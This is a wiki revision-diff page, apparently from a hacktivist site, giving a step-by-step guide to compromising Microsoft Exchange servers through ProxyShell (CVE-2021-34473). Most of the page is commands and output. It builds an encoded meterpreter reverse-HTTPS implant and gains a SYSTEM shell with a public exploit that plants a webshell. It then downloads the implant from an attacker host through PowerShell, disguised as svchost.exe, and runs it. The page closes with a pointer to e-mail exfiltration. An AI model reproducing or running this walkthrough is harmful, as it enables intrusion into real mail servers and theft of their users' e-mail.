Proxyshell: Difference between revisions
Jump to navigation
Jump to search
mNo edit summary |
No edit summary |
||
| (12 intermediate revisions by one other user not shown) | |||
| Line 1: | Line 1: | ||
== Exploiting proxyshell == | == Exploiting proxyshell - CVE-2021-34473 == | ||
=== | * (Book) Mastering Metasploit: Exploit systems, cover your tracks, and bypass security controls with the Metasploit 5.0 framework, 4th Edition | ||
I found that using <code>exploit/windows/http/exchange_proxyshell_rce</code> doesn't work but [https://github.com/Udyz/proxyshell-auto proxyshell-auto] does for gaining RCE. Here we use both the exploit and a meterpreter to compromise vulnerable hosts. | |||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet.md Metasploit - Cheatsheet] | |||
=== Build meterpreter === | |||
First we make an implant to perform post exploitation using metasploit: | First we make an implant to perform post exploitation using metasploit: | ||
<code>msfvenom -p windows/meterpreter/reverse_https LHOST=1.2.3.4 LPORT=8888 -e x86/shikata_ga_nai -i 5 -f exe -o | <code>msfvenom -p windows/meterpreter/reverse_https LHOST=1.2.3.4 LPORT=8888 -e x86/shikata_ga_nai -i 5 -f exe -o meterpreter.exe</code> | ||
Now we set our listener: | Now we set our listener: | ||
| Line 14: | Line 18: | ||
</pre> | </pre> | ||
Host meterpreter for download: | |||
<pre>python3 -m http.server | |||
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... | |||
</pre> | |||
=== Gain a shell === | |||
We first use [https://github.com/Udyz/proxyshell-auto proxyshell-auto exploit] which will give us a shell if the exchange server has powershell enabled. | We first use [https://github.com/Udyz/proxyshell-auto proxyshell-auto exploit] which will give us a shell if the exchange server has powershell enabled. | ||
| Line 31: | Line 41: | ||
SHELL> | SHELL> | ||
</pre> | </pre> | ||
From here we want to | From here we want to [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md download a meterpreter payload] for post exploitation: | ||
<code>SHELL> powershell.exe Invoke-WebRequest -Uri "http://1.2.3.4:8000/meterpreter.exe" -OutFile "c:\ | <code>SHELL> powershell.exe Invoke-WebRequest -Uri "http://1.2.3.4:8000/meterpreter.exe" -OutFile "c:\Windows\Temp\svchost.exe"</code> | ||
We now set our listener and execute the payload: | We now set our listener and execute the payload: | ||
| Line 45: | Line 55: | ||
[*] Meterpreter session 1 opened (1.2.3.4:8888 -> 10.10.10.11:1984) at 2023-07-05 08:00:18 +0000 | [*] Meterpreter session 1 opened (1.2.3.4:8888 -> 10.10.10.11:1984) at 2023-07-05 08:00:18 +0000 | ||
meterpreter > sysinfo | meterpreter > sysinfo | ||
Computer : srvexchange2016 | Computer : srvexchange2016 | ||
OS : Windows 2016+ (10.0 Build 14393). | OS : Windows 2016+ (10.0 Build 14393). | ||
Architecture : x64 | Architecture : x64 | ||
| Line 54: | Line 64: | ||
</pre> | </pre> | ||
=== | === E-mail exfiltration === | ||
For exfiltrating | For exfiltrating e-mails via [https://github.com/Jumbo-WJB/Exchange_SSRF proxyshell exploitation] see [https://enlacehacktivista.org/hackback2.webm Guacamaya's tutorial HackBack video]. | ||
Latest revision as of 08:14, 27 November 2023
Exploiting proxyshell - CVE-2021-34473
- (Book) Mastering Metasploit: Exploit systems, cover your tracks, and bypass security controls with the Metasploit 5.0 framework, 4th Edition
I found that using exploit/windows/http/exchange_proxyshell_rce doesn't work but proxyshell-auto does for gaining RCE. Here we use both the exploit and a meterpreter to compromise vulnerable hosts.
Build meterpreter
First we make an implant to perform post exploitation using metasploit:
msfvenom -p windows/meterpreter/reverse_https LHOST=1.2.3.4 LPORT=8888 -e x86/shikata_ga_nai -i 5 -f exe -o meterpreter.exe
Now we set our listener:
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_https set LHOST 1.2.3.4 set LPORT 8888 run
Host meterpreter for download:
python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Gain a shell
We first use proxyshell-auto exploit which will give us a shell if the exchange server has powershell enabled.
Gain a shell:
user@host:~$ python3 proxyshell-auto/proxyshell.py -t 10.10.10.11 fqdn srvexchange2016.domain.local + Administrator@domain.com legacyDN /o=COMPANY/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=cc84dab2b5f8407ea1545e2f024382aa-Administrator leak_sid S-1-5-21-654894352-2732664023-2722231124-500 token VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBxBZG1pbmlzdHJhdGV1ckBwZWNoZXhwb3J0Lm1nVSxTLTEtNS0yMS02NTQ4OTQzNTItMjczMjY2NDAyMy0yNzIyMjMxMTI0LTUwMEcBAAAABwAAAAxTLTEtNS0zMi01NDRFAAAAAA== set_ews Success with subject grvshwaveotkomvc write webshell at aspnet_client/yhuzv.asPx <Response [404]> nt authority\system SHELL>
From here we want to download a meterpreter payload for post exploitation:
SHELL> powershell.exe Invoke-WebRequest -Uri "http://1.2.3.4:8000/meterpreter.exe" -OutFile "c:\Windows\Temp\svchost.exe"
We now set our listener and execute the payload:
SHELL> powershell.exe "c:\windows\Temp\svchost.exe"
From here we will have a meterpreter connection to work from :)
[*] Started HTTPS reverse handler on https://1.2.3.4:8888 [*] https://1.2.3.4:8888 handling request from 10.10.10.11; (UUID: qdghnakk) Staging x86 payload (176732 bytes) ... [*] Meterpreter session 1 opened (1.2.3.4:8888 -> 10.10.10.11:1984) at 2023-07-05 08:00:18 +0000 meterpreter > sysinfo Computer : srvexchange2016 OS : Windows 2016+ (10.0 Build 14393). Architecture : x64 System Language : en_US Domain : DOMAIN Logged On Users : 6 Meterpreter : x86/windows
E-mail exfiltration
For exfiltrating e-mails via proxyshell exploitation see Guacamaya's tutorial HackBack video.